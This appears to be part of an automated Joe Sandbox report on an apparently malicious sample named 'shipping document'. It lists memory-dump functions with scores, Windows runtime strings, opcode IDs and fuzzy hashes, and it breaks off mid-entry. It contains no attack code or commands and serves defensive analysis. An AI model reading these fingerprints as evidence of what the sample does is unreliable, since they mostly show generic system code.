                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: Legacy$UEFI
                                                                                                • API String ID: 2994545307-634100481
                                                                                                • Opcode ID: e3d3875fbe479c03d0cc8d87c19b83828101e196cb4fd0266287d6beab4f8788
                                                                                                • Instruction ID: d767f793e839d140dbb0d74761835b246d64b2f8406eefe0473b405d59040d01
                                                                                                • Opcode Fuzzy Hash: e3d3875fbe479c03d0cc8d87c19b83828101e196cb4fd0266287d6beab4f8788
                                                                                                • Instruction Fuzzy Hash: DE616E71E403199FDB26DFA8C981BAEFBB5FB48700F54406DE649EB251DB31A940CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 018043D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$MUI
                                                                                                • API String ID: 0-17815947
                                                                                                • Opcode ID: 50a591d7238a3c344f9fc3502ad6d55699a0aaa0e07a0fa2fc63dc509c38c491
                                                                                                • Instruction ID: a98b10aa7eb1080c2b9186b9b0453b77e180f901335ed192b2cdf447b7b78f55
                                                                                                • Opcode Fuzzy Hash: 50a591d7238a3c344f9fc3502ad6d55699a0aaa0e07a0fa2fc63dc509c38c491
                                                                                                • Instruction Fuzzy Hash: 705128B1E4021DAFDB12DFA9CC84AEEBBBDEB44754F100529E611F7291D631AE05CB60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017604E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0176063D
                                                                                                • kLsE, xrefs: 01760540
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                • API String ID: 0-2547482624
                                                                                                • Opcode ID: fc0dc51b54e4fa686fe3f202b59471b256cf966947c83f733c1aa6095a93d28b
                                                                                                • Instruction ID: f4040eecd068d8d85bbb213cb50d66e7c8ed63f3d1db53674281a2e7880366f0
                                                                                                • Opcode Fuzzy Hash: fc0dc51b54e4fa686fe3f202b59471b256cf966947c83f733c1aa6095a93d28b
                                                                                                • Instruction Fuzzy Hash: 4551B1715047428FD725DF68C544AA7FBE8AF84304F24483EFA9A87241E774D945CFA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0176A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 0176A2FB
                                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 0176A309
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                • API String ID: 0-2876891731
                                                                                                • Opcode ID: 7d944f4f893d4af064395a4ce1688ead78f0e2831bfa08c3ee26d574cf9ddd37
                                                                                                • Instruction ID: 83db0fcb9e072f04737a55d1826015c7033e36c7c1d112f60d5ba0d3b190354b
                                                                                                • Opcode Fuzzy Hash: 7d944f4f893d4af064395a4ce1688ead78f0e2831bfa08c3ee26d574cf9ddd37
                                                                                                • Instruction Fuzzy Hash: B1419E31A04645DBDB12DF5AC844B6AFBB8FF85700F2440A9EE00EB696E3B5D940CB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0179A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: Cleanup Group$Threadpool!
                                                                                                • API String ID: 2994545307-4008356553
                                                                                                • Opcode ID: 9b6c180b02881893466f2b827eab2f85d49db7165441194bd2ba15fe84699fb9
                                                                                                • Instruction ID: fac637fcdf19a426bfb334f831be2a118434f996c560fa95aeebf30ad7878b5e
                                                                                                • Opcode Fuzzy Hash: 9b6c180b02881893466f2b827eab2f85d49db7165441194bd2ba15fe84699fb9
                                                                                                • Instruction Fuzzy Hash: B30128B2241704AFD311DF14DD49F16BBF8EB84716F018979B648C7195E334D908CB86
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0176C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: MUI
                                                                                                • API String ID: 0-1339004836
                                                                                                • Opcode ID: e6a36cf98a371b96ca4f30ae327b6cdcd33bd804e7fb7dcbcebdd88bdff67bad
                                                                                                • Instruction ID: 93015d8ad7bbac934a9e201325edfdb8cc6ac2052be67fa55471f3143b317425
                                                                                                • Opcode Fuzzy Hash: e6a36cf98a371b96ca4f30ae327b6cdcd33bd804e7fb7dcbcebdd88bdff67bad
                                                                                                • Instruction Fuzzy Hash: E4826875E002598FEB25CFA9C880BEDFBB9BF48310F148169ED99AB255D7309D81CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017E6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID: 0-3916222277
                                                                                                • Opcode ID: 3fe8343931ac27d39e1e8a30313fd91982dd84fd92fdd16f8e6b2f96c8a10ffb
                                                                                                • Instruction ID: 07406631a1de8dc4251b0a32ca479079cf9a1525e6b50aacda96cd015e635ddc
                                                                                                • Opcode Fuzzy Hash: 3fe8343931ac27d39e1e8a30313fd91982dd84fd92fdd16f8e6b2f96c8a10ffb
                                                                                                • Instruction Fuzzy Hash: DF915271A40219AFEB21EB99CD89FAEFBF8EF18B50F100055F600AB195D774E900CB60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0180E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID: 0-3916222277
                                                                                                • Opcode ID: bd7a3b2a66f40d5f54a87511806110c1d2766268416a7d549b3f9354b82f0ff1
                                                                                                • Instruction ID: f9db051f5553065e06718def2f59f27491e267fc38f5628f97dd40281596726c
                                                                                                • Opcode Fuzzy Hash: bd7a3b2a66f40d5f54a87511806110c1d2766268416a7d549b3f9354b82f0ff1
                                                                                                • Instruction Fuzzy Hash: 5A91AE3290160DAEDB23ABA4DC48FAFFB79EF85744F110829F505E7291EB749A01CB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0179A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: GlobalTags
                                                                                                • API String ID: 0-1106856819
                                                                                                • Opcode ID: a4b3819476fc7eeb96cdcee77602a5728a7d72186ca4cd9c5b95fcffa8ef9e90
                                                                                                • Instruction ID: 7b166213c6cb3c649ab5f82b14b95a0daf9e740aac44c6034eed86105771f74a
                                                                                                • Opcode Fuzzy Hash: a4b3819476fc7eeb96cdcee77602a5728a7d72186ca4cd9c5b95fcffa8ef9e90
                                                                                                • Instruction Fuzzy Hash: 57717AB5E0020E8FDF28CF9CD591AADFBB2BF88710F14816AF905A7245E7319941CB60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01804978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: .mui
                                                                                                • API String ID: 0-1199573805
                                                                                                • Opcode ID: d2001ce742d1d3147d7d62b2ea9afa13bd4a12633f70b881f71706bacb031d1e
                                                                                                • Instruction ID: 06ef37d9028923152444e631eae29898bce1b904eeb487821e4f613219d7017a
                                                                                                • Opcode Fuzzy Hash: d2001ce742d1d3147d7d62b2ea9afa13bd4a12633f70b881f71706bacb031d1e
                                                                                                • Instruction Fuzzy Hash: 6151A372D4022D9FDB52DF99DC54AAEFBB4AF08B04F054129EA11FB291D3749A01CBE0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0177E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: EXT-
                                                                                                • API String ID: 0-1948896318
                                                                                                • Opcode ID: c0c1f6e07ca4719532bf452661a006474e0f2d00c391280b6d3dc693432231c3
                                                                                                • Instruction ID: 3e1392360fe540b5eb68288045395b8b248af840d232fd00b49c8e52f7181e22
                                                                                                • Opcode Fuzzy Hash: c0c1f6e07ca4719532bf452661a006474e0f2d00c391280b6d3dc693432231c3
                                                                                                • Instruction Fuzzy Hash: 8A4191725083429BDB11DA79C984B6FF7E8AF88B14F444ABDFA84D7180EA74D904C793
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017DC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: BinaryHash
                                                                                                • API String ID: 0-2202222882
                                                                                                • Opcode ID: bd63f6b60ef497ba9d57171b1091189f44ef0502abe4a10c45e5d2e99b21fc6d
                                                                                                • Instruction ID: 36782d350bd38b89744dbbcb93f2dc4f38d314f2787749d29d89b9963350ca1a
                                                                                                • Opcode Fuzzy Hash: bd63f6b60ef497ba9d57171b1091189f44ef0502abe4a10c45e5d2e99b21fc6d
                                                                                                • Instruction Fuzzy Hash: FE4131B1D4022DABDB21DB60CC85FDEF77CAB54714F4045A9AB08AB144DB709E89CFA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017F6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #
                                                                                                • API String ID: 0-1885708031
                                                                                                • Opcode ID: 628f22093323c66bf1eb4b2ef51f3da8cdcab81ed3d5fc0497f3acd825b79035
                                                                                                • Instruction ID: 1e48d74d09a5a99ec77f386e31dcafe2325a9033bc6d18b37e33085a911cba9b
                                                                                                • Opcode Fuzzy Hash: 628f22093323c66bf1eb4b2ef51f3da8cdcab81ed3d5fc0497f3acd825b79035
                                                                                                • Instruction Fuzzy Hash: 1A311431A007099AEB22DB69C854BAFFBA8DF45704F54406CFA81AB382C775ED05CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017DCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: BinaryName
                                                                                                • API String ID: 0-215506332
                                                                                                • Opcode ID: ca822a2ae4171f1d2ecaa636e461e04ef32aed361e699bcbaf2fe2a9e4b19316
                                                                                                • Instruction ID: 0198f0c935a5056251171e6c6f41dfad950eac14a6b221270c3caa4d94516eea
                                                                                                • Opcode Fuzzy Hash: ca822a2ae4171f1d2ecaa636e461e04ef32aed361e699bcbaf2fe2a9e4b19316
                                                                                                • Instruction Fuzzy Hash: EE31E17690051AAFEB16DB59C845E6FFB74EB80720F01416DEA05AB291D730EE04EBE0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017E892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 017E895E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                • API String ID: 0-702105204
                                                                                                • Opcode ID: 7b7702d589a2dd2da604d88d1374a9bb1e3e0060a102ac2ddec6770c0b5507a5
                                                                                                • Instruction ID: 3259a7d9a61050475aa3a7e2158b9bf1cd06d454478b1288740550628aa2113d
                                                                                                • Opcode Fuzzy Hash: 7b7702d589a2dd2da604d88d1374a9bb1e3e0060a102ac2ddec6770c0b5507a5
                                                                                                • Instruction Fuzzy Hash: 1C012B36A00301DFE7315B59DC8CA6AFFE5EF89394B04105CFA820B155CB24B840C793
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01802000 Relevance: .8, Instructions: 757COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 44b00e3c4d7ea0e4fe88d2e5725a95408d733bcbe9fb619b81d174606b765cd0
                                                                                                • Instruction ID: abc93884a0f7e1397e93af1724aca31abc843ca054d69136dc2e7fdaae120293
                                                                                                • Opcode Fuzzy Hash: 44b00e3c4d7ea0e4fe88d2e5725a95408d733bcbe9fb619b81d174606b765cd0
                                                                                                • Instruction Fuzzy Hash: 8042D7356043099BD7A6CF68CC98A6BF7E6BF88304F04092DFA85D7290D7B1DA45CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017F8158 Relevance: .6, Instructions: 617COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d50d83333628c9c97b894b42f33649d35a20b6d409254a207fe8babeee4a2c82
                                                                                                • Instruction ID: 48cb6e106c303e8bbf524979c8cb7cf82a83556ad1a2365d3a0382d35dd196f9
                                                                                                • Opcode Fuzzy Hash: d50d83333628c9c97b894b42f33649d35a20b6d409254a207fe8babeee4a2c82
                                                                                                • Instruction Fuzzy Hash: F4424B75A102198FEB24CF69C841BAEFBF5BF48310F14819DEA49AB342D7349985CF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01772840 Relevance: .6, Instructions: 605COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5be79d17f3d66009c781e4c98921d3c3cea99fa9d131f388e321ae9b8c83c2f8
                                                                                                • Instruction ID: fd818a22721b8e14144e57835297d1bd803a36b67878adb9f71713b9b33a79b5
                                                                                                • Opcode Fuzzy Hash: 5be79d17f3d66009c781e4c98921d3c3cea99fa9d131f388e321ae9b8c83c2f8
                                                                                                • Instruction Fuzzy Hash: 5E32DC70A007558BEB25CF69C8847BAFBF2BF84B04F24411DE596AB385D735A942CF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0180A118 Relevance: .6, Instructions: 591COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 01f2bfc6d66a4b16046f5f65f0233859c42676014161d7070dc177734729bff5
                                                                                                • Instruction ID: cc04da5a870237425a58ff46231ce77a7c358da1a116ace97809cf6493e240ec
                                                                                                • Opcode Fuzzy Hash: 01f2bfc6d66a4b16046f5f65f0233859c42676014161d7070dc177734729bff5
                                                                                                • Instruction Fuzzy Hash: AF22BE742047698BEBAACF2DC890372BBF1AF44344F088559E996CF2C6D375D642CB60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01766A50 Relevance: .5, Instructions: 548COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 96dd8377db65beea2c0eaa1f94d08c74028b7f222378ab9c0f61eeef6fe44bed
                                                                                                • Instruction ID: bc19b74bb0b6102de46473567c467a41bc5b211863874927c8b1e22604b3c21d
                                                                                                • Opcode Fuzzy Hash: 96dd8377db65beea2c0eaa1f94d08c74028b7f222378ab9c0f61eeef6fe44bed
                                                                                                • Instruction Fuzzy Hash: B5329C75A04205CFDB25CF68C480AAAFBF6FF48300F6485ADE955AB752D734E941CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01784A35 Relevance: .4, Instructions: 423COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                • Instruction ID: 4c6337a36ada8cd1f9afb1a207125e10cc86f015bfa42c248bfdc9f94d681607
                                                                                                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                • Instruction Fuzzy Hash: F4F18E71E4021A9BDB15DFA9C984BAEFBF5AF48754F04812DE902EB344E7B4D841CB60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017F892B Relevance: .4, Instructions: 386COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 02b890cc79dff2c3e2b4f0e2162893b18f0b4a22492cb62183c89cb5f050f5d7
                                                                                                • Instruction ID: 2111d52b422dc01e809b5f886e18deff5609ce97a7834688482b449e805a8a36
                                                                                                • Opcode Fuzzy Hash: 02b890cc79dff2c3e2b4f0e2162893b18f0b4a22492cb62183c89cb5f050f5d7
                                                                                                • Instruction Fuzzy Hash: 97D1C071A0060A9BDF15CF69C841BBFF7B1AF88304F1881AEDA55A7341E735EA05CB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017665D0 Relevance: .4, Instructions: 383COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c5025c02e956b5de13b2eb43b4932e4c60b57d50d79b9dccc05a637d92bde262
                                                                                                • Instruction ID: 59824840ed673ce44a3e7198932cc14e523231561774dfd8df72b418cb9fd27a
                                                                                                • Opcode Fuzzy Hash: c5025c02e956b5de13b2eb43b4932e4c60b57d50d79b9dccc05a637d92bde262
                                                                                                • Instruction Fuzzy Hash: F1E16871608342CFC715CF28C090A6AFBE4BF89304F558A6DF99987352EB31E905CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01758397 Relevance: .4, Instructions: 380COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 292eb359d39709ef9a3d99a56c756409bec87a7005ae234eb0045f718e8a6a91
                                                                                                • Instruction ID: 7af61c4c548065315e2b0bac34218e5b3f2824a0c169d088bb1d3cc559eb6691
                                                                                                • Opcode Fuzzy Hash: 292eb359d39709ef9a3d99a56c756409bec87a7005ae234eb0045f718e8a6a91
                                                                                                • Instruction Fuzzy Hash: D2D1DF71A00206DBDB54DF6AC8C0BBAF7A5FF54308F144669ED12DB280EB74E951CB62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017E8243 Relevance: .3, Instructions: 322COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                • Instruction ID: b3f6df6f7238ea0f4ca6ce4cb0740ccef3f3033c0d4b76bfa59a39ccbffcc8da
                                                                                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                • Instruction Fuzzy Hash: 8EB16F75A00605AFDF24DF99C948BABFBF9FF88304F10446DAA02A7794DA34E945CB11
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01770535 Relevance: .3, Instructions: 300COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                • Instruction ID: c59b4cb274c7252c095a01fa1aafde84df3eb9e511daeb0a04deadd89439953d
                                                                                                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                • Instruction Fuzzy Hash: D7B1F331604646AFDF25DB68C854BBEFBF6AF85700F28019DE652DB285DB30E941CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017683C0 Relevance: .3, Instructions: 281COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b111c17b40edcce0b862400c8761afbbc52efde3c5c6a7b315bfa459f9fb22de
                                                                                                • Instruction ID: 40f0aa87a8a5c59f975e31025b8e3101208ddcad1dc85d3947723d918073f7f8
                                                                                                • Opcode Fuzzy Hash: b111c17b40edcce0b862400c8761afbbc52efde3c5c6a7b315bfa459f9fb22de
                                                                                                • Instruction Fuzzy Hash: 56C14774108341CFD764CF19C494BAAFBE9BF88704F54496DE98987292E774EA08CF92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0175C427 Relevance: .3, Instructions: 280COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
